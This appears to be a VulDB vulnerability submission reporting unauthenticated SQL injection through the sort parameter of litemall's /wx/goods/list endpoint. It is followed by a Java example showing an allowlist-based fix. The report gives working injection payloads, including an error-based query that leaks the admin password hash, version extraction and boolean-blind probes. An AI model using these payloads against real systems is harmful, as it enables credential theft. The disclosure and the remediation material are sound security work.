Submit #811467: linlinjava litemall up to 1.8.0 SQL Injection Info

Title: linlinjava litemall up to 1.8.0 SQL Injection
Description: A critical vulnerability was found in linlinjava litemall (https://github.com/linlinjava/litemall) up to 1.8.0. This vulnerability affects the list function of WxGoodsController.java in the front-end WeChat API. The manipulation of the argument sort/order leads to SQL injection.

IMPORTANT: Unlike previously reported CVEs (CVE-2024-24323, CVE-2024-46382) which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list) which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2).

Vulnerable code in WxGoodsController.java:

    @GetMapping("list")
    public Object list(@RequestParam(defaultValue="add_time") String sort,
                       @RequestParam(defaultValue="desc") String order, ...)

LitemallGoodsService.java line 121-122:

    if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) {
        example.setOrderByClause(sort + " " + order);
    }

MyBatis: order by ${orderByClause}

No @Sort whitelist annotation is applied to WxGoodsController.

PoC 1 - Extract admin password hash from FRONT-END (no admin auth required):

    GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10

Response error: XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ'
Admin bcrypt hash leaked from front-end API!

PoC 2 - Extract MySQL version:

    GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc

Response error: XPATH syntax error: '~8.0.45~'

PoC 3 - Boolean-based blind:

    GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc -> sorted by id
    GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc -> sorted by name

Different order confirms injection.

Comparison: CVE-2024-24323/CVE-2024-46382 require admin Shiro session. THIS vulnerability requires only regular user auth or no auth at all.

Reporter: berna ([email protected])
Source: https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512
User: berna (UID 97558)
Submission: 2026-04-23 16:38 (1 month ago)
Moderation: 2026-05-17 11:36 (24 days later)
Status: Accepted
VulDB Entry: 364396 [linlinjava litemall up to 1.8.0 Front-end WeChat API WxGoodsController.java list SQL injection]
Points: 20
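The root cause in the description is an ORDER BY clause built by concatenating caller-controlled sort/order strings and splicing them in via MyBatis ${...}. The following added example (not litemall's own code) shows that pattern beside an allowlisted version, which is the same idea as the @Sort whitelist the description notes is missing on the front-end controller; the column names are a hypothetical allowlist chosen for illustration.

```java
import java.util.Set;

// Added example, not code from the litemall project. Contrasts the page's
// vulnerable concatenation with an allowlisted ORDER BY builder.
public class OrderByAllowlist {

    // Vulnerable pattern described in the report: sort and order come straight
    // from request parameters and end up in "order by ${orderByClause}", so an
    // SQL expression in "sort" is executed by the database unchanged.
    static String unsafeOrderBy(String sort, String order) {
        return sort + " " + order;
    }

    // Hardened form: only names from a fixed allowlist are ever placed into the
    // clause, so identifiers cannot be parameterised but also cannot be forged.
    // Column names here are a hypothetical allowlist, not litemall's schema.
    private static final Set<String> SORT_COLUMNS = Set.of("add_time", "retail_price", "name");
    private static final Set<String> ORDER_DIRS = Set.of("asc", "desc");

    static String safeOrderBy(String sort, String order) {
        String col = (sort == null || sort.isEmpty()) ? "add_time" : sort;
        String dir = (order == null || order.isEmpty()) ? "desc" : order.toLowerCase();
        if (!SORT_COLUMNS.contains(col) || !ORDER_DIRS.contains(dir)) {
            // Reject rather than sanitise: the request is malformed by definition.
            throw new IllegalArgumentException("rejected sort/order: " + sort + "/" + order);
        }
        return col + " " + dir;
    }

    public static void main(String[] args) {
        // Constructed input mirroring the report's PoC shape (an SQL function in "sort").
        String injected = "extractvalue(1,concat(0x7e,version(),0x7e))";
        System.out.println(unsafeOrderBy(injected, "asc"));     // function reaches the query
        System.out.println(safeOrderBy("retail_price", "ASC"));  // retail_price asc
        try {
            safeOrderBy(injected, "asc");
        } catch (IllegalArgumentException e) {
            System.out.println("blocked: " + e.getMessage());   // rejected before any SQL
        }
    }
}
```

Logging the rejection (rather than silently falling back to a default) also gives the SOC a clean detection signal for probing of the /wx/goods/list sort parameter.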
